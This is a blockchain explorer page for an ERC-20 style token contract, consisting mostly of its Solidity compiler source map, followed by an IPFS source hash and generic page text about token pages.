9;;:5;:19;;;;24961:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;25067:1;25048:21;;:7;:21;;;;25040:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;25151:6;25121:11;:18;25133:5;25121:18;;;;;;;;;;;;;;;:27;25140:7;25121:27;;;;;;;;;;;;;;;:36;;;;25189:7;25173:32;;25182:5;25173:32;;;25198:6;25173:32;;;;;;:::i;:::-;;;;;;;;24833:380;;;:::o;25504:441::-;25639:24;25666:25;25676:5;25683:7;25666:9;:25::i;:::-;25639:52;;25726:17;25706:16;:37;25702:236;;25788:6;25768:16;:26;;25760:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;25864:51;25873:5;25880:7;25908:6;25889:16;:25;25864:8;:51::i;:::-;25702:236;25628:317;25504:441;;;:::o;21360:1236::-;21507:1;21491:18;;:4;:18;;;;21483:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21584:1;21570:16;;:2;:16;;;;21562:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;21639:38;21660:4;21666:2;21670:6;21639:20;:38::i;:::-;21690:19;21712:7;:13;21720:4;21712:13;;;;;;;;;;;;;;;;21690:35;;21759:6;21744:11;:21;;21736:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;21819:16;21838:4;;21819:23;;21853:11;21867:6;:12;21874:4;21867:12;;;;;;;;;;;;;;;;21853:26;;21901:1;21894:3;:8;21890:238;;21930:3;21919:14;;21890:238;;;21994:1;21969:27;;:13;;;;;;;;;;;:27;;;21965:152;;22029:13;;;;;;;;;;;22021:21;;:4;:21;;;22017:85;;;22078:4;;22067:15;;22017:85;21965:152;21890:238;22140:17;22160:29;22185:3;22160:20;22171:8;22160:6;:10;;:20;;;;:::i;:::-;:24;;:29;;;;:::i;:::-;22140:49;;22202:11;22216:21;22227:9;22216:6;:10;;:21;;;;:::i;:::-;22202:35;;22295:6;22281:11;:20;22265:7;:13;22273:4;22265:13;;;;;;;;;;;;;;;:36;;;;22484:3;22469:7;:11;22477:2;22469:11;;;;;;;;;;;;;;;;:18;;;;;;;;;;;22527:2;22512:26;;22521:4;22512:26;;;22531:6;22512:26;;;;;;:::i;:::-;;;;;;;;22551:37;22571:4;22577:2;22581:6;22551:19;:37::i;:::-;21472:1124;;;;;21360:1236;;;:::o;11742:132::-;11817:12;:10;:12::i;:::-;11806:23;;:7;:5;:7::i;:::-;:23;;;11798:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11742:132::o;12844:191::-;12918:16;12937:6;;;;;;;;;;;12918:25;;12963:8;12954:6;;:17;;;;;;;;;;;;;;;;;;13018:8;12987:40;;13008:8;12987:40;;;;;;;;;;;;12907:128;12844:191;:::o;26545:125::-;;;;:::o;3514:98::-;3572:7;3603:1;3599;:5;;;;:::i;:::-;3592:12;;3514:98;;;;:::o;3913:::-;3971:7;4002:1;3998;:5;;;;:::i;:::-;3991:12;;3913:98;;;;:::o;3157:::-;3215:7;3246:1;3242;:5;;;;:::i;:::-;3235:12;;3157:98;;;;:::o;27274:124::-;;;;:::o;7:139:1:-;53:5;91:6;78:20;69:29;;107:33;134:5;107:33;:::i;:::-;7:139;;;;:::o;152:::-;198:5;236:6;223:20;214:29;;252:33;279:5;252:33;:::i;:::-;152:139;;;;:::o;297:329::-;356:6;405:2;393:9;384:7;380:23;376:32;373:119;;;411:79;;:::i;:::-;373:119;531:1;556:53;601:7;592:6;581:9;577:22;556:53;:::i;:::-;546:63;;502:117;297:329;;;;:::o;632:474::-;700:6;708;757:2;745:9;736:7;732:23;728:32;725:119;;;763:79;;:::i;:::-;725:119;883:1;908:53;953:7;944:6;933:9;929:22;908:53;:::i;:::-;898:63;;854:117;1010:2;1036:53;1081:7;1072:6;1061:9;1057:22;1036:53;:::i;:::-;1026:63;;981:118;632:474;;;;;:::o;1112:619::-;1189:6;1197;1205;1254:2;1242:9;1233:7;1229:23;1225:32;1222:119;;;1260:79;;:::i;:::-;1222:119;1380:1;1405:53;1450:7;1441:6;1430:9;1426:22;1405:53;:::i;:::-;1395:63;;1351:117;1507:2;1533:53;1578:7;1569:6;1558:9;1554:22;1533:53;:::i;:::-;1523:63;;1478:118;1635:2;1661:53;1706:7;1697:6;1686:9;1682:22;1661:53;:::i;:::-;1651:63;;1606:118;1112:619;;;;;:::o;1737:474::-;1805:6;1813;1862:2;1850:9;1841:7;1837:23;1833:32;1830:119;;;1868:79;;:::i;:::-;1830:119;1988:1;2013:53;2058:7;2049:6;2038:9;2034:22;2013:53;:::i;:::-;2003:63;;1959:117;2115:2;2141:53;2186:7;2177:6;2166:9;2162:22;2141:53;:::i;:::-;2131:63;;2086:118;1737:474;;;;;:::o;2217:118::-;2304:24;2322:5;2304:24;:::i;:::-;2299:3;2292:37;2217:118;;:::o;2341:109::-;2422:21;2437:5;2422:21;:::i;:::-;2417:3;2410:34;2341:109;;:::o;2456:364::-;2544:3;2572:39;2605:5;2572:39;:::i;:::-;2627:71;2691:6;2686:3;2627:71;:::i;:::-;2620:78;;2707:52;2752:6;2747:3;2740:4;2733:5;2729:16;2707:52;:::i;:::-;2784:29;2806:6;2784:29;:::i;:::-;2779:3;2775:39;2768:46;;2548:272;2456:364;;;;:::o;2826:366::-;2968:3;2989:67;3053:2;3048:3;2989:67;:::i;:::-;2982:74;;3065:93;3154:3;3065:93;:::i;:::-;3183:2;3178:3;3174:12;3167:19;;2826:366;;;:::o;3198:::-;3340:3;3361:67;3425:2;3420:3;3361:67;:::i;:::-;3354:74;;3437:93;3526:3;3437:93;:::i;:::-;3555:2;3550:3;3546:12;3539:19;;3198:366;;;:::o;3570:::-;3712:3;3733:67;3797:2;3792:3;3733:67;:::i;:::-;3726:74;;3809:93;3898:3;3809:93;:::i;:::-;3927:2;3922:3;3918:12;3911:19;;3570:366;;;:::o;3942:::-;4084:3;4105:67;4169:2;4164:3;4105:67;:::i;:::-;4098:74;;4181:93;4270:3;4181:93;:::i;:::-;4299:2;4294:3;4290:12;4283:19;;3942:366;;;:::o;4314:::-;4456:3;4477:67;4541:2;4536:3;4477:67;:::i;:::-;4470:74;;4553:93;4642:3;4553:93;:::i;:::-;4671:2;4666:3;4662:12;4655:19;;4314:366;;;:::o;4686:::-;4828:3;4849:67;4913:2;4908:3;4849:67;:::i;:::-;4842:74;;4925:93;5014:3;4925:93;:::i;:::-;5043:2;5038:3;5034:12;5027:19;;4686:366;;;:::o;5058:::-;5200:3;5221:67;5285:2;5280:3;5221:67;:::i;:::-;5214:74;;5297:93;5386:3;5297:93;:::i;:::-;5415:2;5410:3;5406:12;5399:19;;5058:366;;;:::o;5430:::-;5572:3;5593:67;5657:2;5652:3;5593:67;:::i;:::-;5586:74;;5669:93;5758:3;5669:93;:::i;:::-;5787:2;5782:3;5778:12;5771:19;;5430:366;;;:::o;5802:::-;5944:3;5965:67;6029:2;6024:3;5965:67;:::i;:::-;5958:74;;6041:93;6130:3;6041:93;:::i;:::-;6159:2;6154:3;6150:12;6143:19;;5802:366;;;:::o;6174:118::-;6261:24;6279:5;6261:24;:::i;:::-;6256:3;6249:37;6174:118;;:::o;6298:112::-;6381:22;6397:5;6381:22;:::i;:::-;6376:3;6369:35;6298:112;;:::o;6416:222::-;6509:4;6547:2;6536:9;6532:18;6524:26;;6560:71;6628:1;6617:9;6613:17;6604:6;6560:71;:::i;:::-;6416:222;;;;:::o;6644:210::-;6731:4;6769:2;6758:9;6754:18;6746:26;;6782:65;6844:1;6833:9;6829:17;6820:6;6782:65;:::i;:::-;6644:210;;;;:::o;6860:313::-;6973:4;7011:2;7000:9;6996:18;6988:26;;7060:9;7054:4;7050:20;7046:1;7035:9;7031:17;7024:47;7088:78;7161:4;7152:6;7088:78;:::i;:::-;7080:86;;6860:313;;;;:::o;7179:419::-;7345:4;7383:2;7372:9;7368:18;7360:26;;7432:9;7426:4;7422:20;7418:1;7407:9;7403:17;7396:47;7460:131;7586:4;7460:131;:::i;:::-;7452:139;;7179:419;;;:::o;7604:::-;7770:4;7808:2;7797:9;7793:18;7785:26;;7857:9;7851:4;7847:20;7843:1;7832:9;7828:17;7821:47;7885:131;8011:4;7885:131;:::i;:::-;7877:139;;7604:419;;;:::o;8029:::-;8195:4;8233:2;8222:9;8218:18;8210:26;;8282:9;8276:4;8272:20;8268:1;8257:9;8253:17;8246:47;8310:131;8436:4;8310:131;:::i;:::-;8302:139;;8029:419;;;:::o;8454:::-;8620:4;8658:2;8647:9;8643:18;8635:26;;8707:9;8701:4;8697:20;8693:1;8682:9;8678:17;8671:47;8735:131;8861:4;8735:131;:::i;:::-;8727:139;;8454:419;;;:::o;8879:::-;9045:4;9083:2;9072:9;9068:18;9060:26;;9132:9;9126:4;9122:20;9118:1;9107:9;9103:17;9096:47;9160:131;9286:4;9160:131;:::i;:::-;9152:139;;8879:419;;;:::o;9304:::-;9470:4;9508:2;9497:9;9493:18;9485:26;;9557:9;9551:4;9547:20;9543:1;9532:9;9528:17;9521:47;9585:131;9711:4;9585:131;:::i;:::-;9577:139;;9304:419;;;:::o;9729:::-;9895:4;9933:2;9922:9;9918:18;9910:26;;9982:9;9976:4;9972:20;9968:1;9957:9;9953:17;9946:47;10010:131;10136:4;10010:131;:::i;:::-;10002:139;;9729:419;;;:::o;10154:::-;10320:4;10358:2;10347:9;10343:18;10335:26;;10407:9;10401:4;10397:20;10393:1;10382:9;10378:17;10371:47;10435:131;10561:4;10435:131;:::i;:::-;10427:139;;10154:419;;;:::o;10579:::-;10745:4;10783:2;10772:9;10768:18;10760:26;;10832:9;10826:4;10822:20;10818:1;10807:9;10803:17;10796:47;10860:131;10986:4;10860:131;:::i;:::-;10852:139;;10579:419;;;:::o;11004:222::-;11097:4;11135:2;11124:9;11120:18;11112:26;;11148:71;11216:1;11205:9;11201:17;11192:6;11148:71;:::i;:::-;11004:222;;;;:::o;11232:214::-;11321:4;11359:2;11348:9;11344:18;11336:26;;11372:67;11436:1;11425:9;11421:17;11412:6;11372:67;:::i;:::-;11232:214;;;;:::o;11533:99::-;11585:6;11619:5;11613:12;11603:22;;11533:99;;;:::o;11638:169::-;11722:11;11756:6;11751:3;11744:19;11796:4;11791:3;11787:14;11772:29;;11638:169;;;;:::o;11813:305::-;11853:3;11872:20;11890:1;11872:20;:::i;:::-;11867:25;;11906:20;11924:1;11906:20;:::i;:::-;11901:25;;12060:1;11992:66;11988:74;11985:1;11982:81;11979:107;;;12066:18;;:::i;:::-;11979:107;12110:1;12107;12103:9;12096:16;;11813:305;;;;:::o;12124:185::-;12164:1;12181:20;12199:1;12181:20;:::i;:::-;12176:25;;12215:20;12233:1;12215:20;:::i;:::-;12210:25;;12254:1;12244:35;;12259:18;;:::i;:::-;12244:35;12301:1;12298;12294:9;12289:14;;12124:185;;;;:::o;12315:348::-;12355:7;12378:20;12396:1;12378:20;:::i;:::-;12373:25;;12412:20;12430:1;12412:20;:::i;:::-;12407:25;;12600:1;12532:66;12528:74;12525:1;12522:81;12517:1;12510:9;12503:17;12499:105;12496:131;;;12607:18;;:::i;:::-;12496:131;12655:1;12652;12648:9;12637:20;;12315:348;;;;:::o;12669:191::-;12709:4;12729:20;12747:1;12729:20;:::i;:::-;12724:25;;12763:20;12781:1;12763:20;:::i;:::-;12758:25;;12802:1;12799;12796:8;12793:34;;;12807:18;;:::i;:::-;12793:34;12852:1;12849;12845:9;12837:17;;12669:191;;;;:::o;12866:96::-;12903:7;12932:24;12950:5;12932:24;:::i;:::-;12921:35;;12866:96;;;:::o;12968:90::-;13002:7;13045:5;13038:13;13031:21;13020:32;;12968:90;;;:::o;13064:126::-;13101:7;13141:42;13134:5;13130:54;13119:65;;13064:126;;;:::o;13196:77::-;13233:7;13262:5;13251:16;;13196:77;;;:::o;13279:86::-;13314:7;13354:4;13347:5;13343:16;13332:27;;13279:86;;;:::o;13371:307::-;13439:1;13449:113;13463:6;13460:1;13457:13;13449:113;;;13548:1;13543:3;13539:11;13533:18;13529:1;13524:3;13520:11;13513:39;13485:2;13482:1;13478:10;13473:15;;13449:113;;;13580:6;13577:1;13574:13;13571:101;;;13660:1;13651:6;13646:3;13642:16;13635:27;13571:101;13420:258;13371:307;;;:::o;13684:320::-;13728:6;13765:1;13759:4;13755:12;13745:22;;13812:1;13806:4;13802:12;13833:18;13823:81;;13889:4;13881:6;13877:17;13867:27;;13823:81;13951:2;13943:6;13940:14;13920:18;13917:38;13914:84;;;13970:18;;:::i;:::-;13914:84;13735:269;13684:320;;;:::o;14010:180::-;14058:77;14055:1;14048:88;14155:4;14152:1;14145:15;14179:4;14176:1;14169:15;14196:180;14244:77;14241:1;14234:88;14341:4;14338:1;14331:15;14365:4;14362:1;14355:15;14382:180;14430:77;14427:1;14420:88;14527:4;14524:1;14517:15;14551:4;14548:1;14541:15;14691:117;14800:1;14797;14790:12;14814:102;14855:6;14906:2;14902:7;14897:2;14890:5;14886:14;14882:28;14872:38;;14814:102;;;:::o;14922:222::-;15062:34;15058:1;15050:6;15046:14;15039:58;15131:5;15126:2;15118:6;15114:15;15107:30;14922:222;:::o;15150:225::-;15290:34;15286:1;15278:6;15274:14;15267:58;15359:8;15354:2;15346:6;15342:15;15335:33;15150:225;:::o;15381:221::-;15521:34;15517:1;15509:6;15505:14;15498:58;15590:4;15585:2;15577:6;15573:15;15566:29;15381:221;:::o;15608:179::-;15748:31;15744:1;15736:6;15732:14;15725:55;15608:179;:::o;15793:225::-;15933:34;15929:1;15921:6;15917:14;15910:58;16002:8;15997:2;15989:6;15985:15;15978:33;15793:225;:::o;16024:182::-;16164:34;16160:1;16152:6;16148:14;16141:58;16024:182;:::o;16212:224::-;16352:34;16348:1;16340:6;16336:14;16329:58;16421:7;16416:2;16408:6;16404:15;16397:32;16212:224;:::o;16442:223::-;16582:34;16578:1;16570:6;16566:14;16559:58;16651:6;16646:2;16638:6;16634:15;16627:31;16442:223;:::o;16671:224::-;16811:34;16807:1;16799:6;16795:14;16788:58;16880:7;16875:2;16867:6;16863:15;16856:32;16671:224;:::o;16901:122::-;16974:24;16992:5;16974:24;:::i;:::-;16967:5;16964:35;16954:63;;17013:1;17010;17003:12;16954:63;16901:122;:::o;17029:::-;17102:24;17120:5;17102:24;:::i;:::-;17095:5;17092:35;17082:63;;17141:1;17138;17131:12;17082:63;17029:122;:::o

Swarm Source

ipfs://c3779189c603b139594bb24f5b94bc22cf2e5b61ddd10294d4efaec846b6b093
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.